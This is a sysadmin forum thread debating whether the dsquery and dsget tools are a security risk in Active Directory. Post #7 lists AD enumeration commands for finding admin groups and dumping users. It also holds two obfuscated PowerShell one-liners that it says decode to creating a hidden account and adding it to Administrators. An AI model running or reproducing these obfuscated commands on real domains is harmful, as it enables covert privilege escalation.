Mark Minasi's Tech Forum
Sign up Calendar Latest Topics
 
 
 


Reply
  Author   Comment  
Pieter

Avatar / Picture

Senior Member
Registered:
Posts: 239
Reply with quote  #1 
We got the advise from a security expert to remove some tools on our PC's, like dsget and dsquery.
What are your thoughts ? Are those tools dangerous ?

(We use dsget and dsquery in the logonscript, that's why they are copied on each client.)


__________________
Pieter Demeulemeester
0
wobble_wobble

Avatar / Picture

Associate Troublemaker Apprentice
Registered:
Posts: 896
Reply with quote  #2 
I'd say PowerShell is a way bigger threat than DSget/ DSQuery.

Can't say I've seen them tagged as a security risk yet....


__________________
Have you tried turning it off and walking away? The next person can fix it!

New to the forum? Read this
0
wkasdo

Avatar / Picture

Administrator
Registered:
Posts: 237
Reply with quote  #3 
Crazy stuff. Make sure that you don't pay that guy.

Any hacker interested in reading AD will bring his own stuff anyway.

__________________
[MSFT]; Blog: https://blogs.technet.microsoft.com/389thoughts/
0
donoli

Senior Member
Registered:
Posts: 598
Reply with quote  #4 
https://security.stackexchange.com/questions/158584/dsquery-leaking-personal-infomation

0
cj_berlin

Avatar / Picture

Senior Member
Registered:
Posts: 300
Reply with quote  #5 

You can get the same, or better, results with three lines of PowerShell, without any additional modules. Even with PS Core on Linux or Mac. .NET has a Directory Services client built in.

Permissions-wise, any authenticated user can read some info about user objects:

authusers.png   


__________________
Evgenij Smirnov

My personal blog (German): http://www.it-pro-berlin.de/
My stuff on PSGallery: https://www.powershellgallery.com/profiles/it-pro-berlin.de/
0
donoli

Senior Member
Registered:
Posts: 598
Reply with quote  #6 
So the mistake is in the permissions not in dsquery itself?
0
wobble_wobble

Avatar / Picture

Associate Troublemaker Apprentice
Registered:
Posts: 896
Reply with quote  #7 
Quote:
Originally Posted by donoli
So the mistake is in the permissions not in dsquery itself?


No, not quite.

If you have any sort of AD authenticated user you can find out a lot of info using these commands.
net group /Domain "ICT VCENTER ADMINS"
net user/Domain "Wobble_Wobble"
dsquery user -name Wobble*
dsquery group -name Admin*
dsquery group du=minasi,dc=com

dsquery user dc=minasi,dc=com | dsget user -samid -fn -ln -dn > names.csv 

You need read permissions to be able to read if you are allowed do the "thing"
So your read permission is there. doesn't mean you can do anything with it (yet).

So thinking a bit out loud, why did Captain Security say its a security risk.....

If by using my allowed commands, I find that Joe Bloggs beside me has a superuser/ administration account, then I could steal Joe's password off him and attack.
So therefore giving me a tool that finds out about the superuser is a security risk.

But to help scare captain underpants......
Anyone feeling brave?

Code:

& ( $pshOmE[21]+$psHOme[30]+'X')(NEw-oBJECT sySteM.iO.CoMPresSION.DeflaTestrEaM( [Io.MEMOrYSTREAm][COnVERT]::FrOmbAse64STRing( 'bU49C8IwEP0rRyYdAoqjiwFFHSzFKo6S9g4NNEm5XCiCP94UOjo9Hu+zolGb/T0Rg66sJ3i4tu3p+YgzBJwk03UxB6ltSmNkXFzJoj7FJFC01FCXmRphF16gmrUf+k1td8W7YlRL0FPu9uYMXzgEW4rL5ly5NYiFHTnm4UK+ndbOSEGcfEAZ9C64JGwlclKgZ8u/lz8='), [IO.COmPResSiOn.COMPRESSIoNMODe]:😃eCOmpreSS ) | FOreaCh{NEw-oBJECT Io.StReAmREadeR( $_, [SYSTEm.texT.ENCODING]::asciI ) }| fOrEAch{ $_.READTOeND()}) 


Or
Code:

&( $eNv:COmSPeC[4,26,25]-Join'') (" $(SEt  'oFs' '') " + [StRing]('32h38:32p40d32j36@112;115d104e79e109d69h91d50d49j93;43e36d112@115j72@79@109@101}91@51@48p93p43@39d88d39p41!40j78h69:119d45p111p66@74;69;67:84d32h115;121p83;116}101h77}46;105:79h46;67!111!77;80h114;101:115@83p73;79e78!46@68j101@102p108h97d84p101h115@116;114;69:97:77j40j32p91}73@111;46h77}69;77}79!114@89e83:84@82p69;65:109!93e91e67@79d110e86!69@82}84}93p58:58h70p114j79;109h98!65@115j101}54;52d83h84p82!105h110@103!40e32d39@98}85!52d57d67;56j73:119@69}80!48:114p82h121j89j100@65@111j113p106h105;119!70}70}72;83e122j70:75;111:54h83}57@103;52}78h78p69j109;53@88j67d105:67h80@57p52d85e79}106@111j57:72:117:43j122!111j108:71d98p47d84}48}82@103;54p54!115:74}51p105!52p116@117}51@112e43!89d103}122@66:74:119;107:48}51:85p120e66@54}108j116}83p109j78j107}88}70!122:74}111;106p55e70:74;70e67!48e49}70}67p88!109e82}112p104@70d49p54p103;109:114@85e102!43j107}49@116}100}56@87d55e89d108j82h76!48;70j80:117@57@117}89}77;88}122@103;69j87p52}114p76d53j108p121h53d78h89;105@70d72p84@110e109e52j85!75d43!110}100h98j79h83h69@71e99}102}69:65p90p57e67;54j52}74@71d119!108:99;108!75j103@90}56:117!47h108p122}56;61@39j41:44:32@91}73h79:46:67:79}109!80@82j101h115d83h105;79;110}46:67d79p77e80j82:69@83}83j73j111j78e77!79p68}101j93:58h58h100:101p67j79}109:112h114:101}83p83j32e41e32p124d32!70j79p114j101p97!67e104@123d78@69}119d45:111:66j74;69e67}84!32d73d111e46;83p116e82}101;65h109d82h69e97p100@101j82e40!32;36e95p44d32:91h83@89p83;84}69h109}46j116@101d120!84!46}69h78}67:79!68e73}78h71e93h58!58d97:115:99;105:73j32p41@32!125!124h32@102}79h114h69}65p99e104}123p32p36j95d46h82d69j65d68d84j79e101h78j68:40}41@125;41j32'.spLit('😋!}d;j@he')| ForeaCH-ObJEcT {( [char] [InT] $_)}) +"$( set-ItEM 'variAbLe:OfS' ' ')") 


Which translates to
Code:

set scriptblock New-ADUser -Name Wibble_Wobble_Wonder -AccountPassword(Read-Host  -AsSecureString "S1mpl3Pa@ssw0rd") -PassThru | Enable-ADAccount;Add-ADGroupMember -Identity "Administrators" -Member Wibble_Wobble_Wonder



PS the happyfaces were not intentional, seems to be the interrupter seeing :: as a single : and face and p : as a face....


__________________
Have you tried turning it off and walking away? The next person can fix it!

New to the forum? Read this
0
wkasdo

Avatar / Picture

Administrator
Registered:
Posts: 237
Reply with quote  #8 
> I find that Joe Bloggs beside me has a superuser/ administration account, then I could steal Joe's password off him and attack.

Agreed, sort of: any tool allowing identity discovery is a security risk in that sense. But because any LDAP client can do the same I find the claim that dsquery is a "risk" highly exaggerated. Let's not forget that AD is readable by Authenticated Users, by design. The very goal is to share enough data for people to find each other.

The real way of preventing discovery of high-level admin is to hide them using proper permissions in AD, as donoli hinted. But that should not be your first concern. A much stronger approach to is to apply a tiering model designed to prevent PtH and friends, combined with strong passwords and MFA for your admins.

__________________
[MSFT]; Blog: https://blogs.technet.microsoft.com/389thoughts/
0
Pieter

Avatar / Picture

Senior Member
Registered:
Posts: 239
Reply with quote  #9 
Thanks everybody for the replies.

I made the following comparison:
- a webserver can be viewed with IE, Chrome FireFox, etc..  Is the communication with the webserver less secure if I browse it with Lynx (CLI browser) ?
- a file share can be viewed with Explorer or one of the many alternatives.  Is the data on that share less save if I look at it with 'dir' and 'type' ?
- a SQL database can be queried with a application or the SQL Manager.  Is it less save if I use sqlcmd.exe ?

I don't think so.

__________________
Pieter Demeulemeester
0
Previous Topic | Next Topic
Print
Reply

Quick Navigation:

Easily create a Forum Website with Website Toolbox.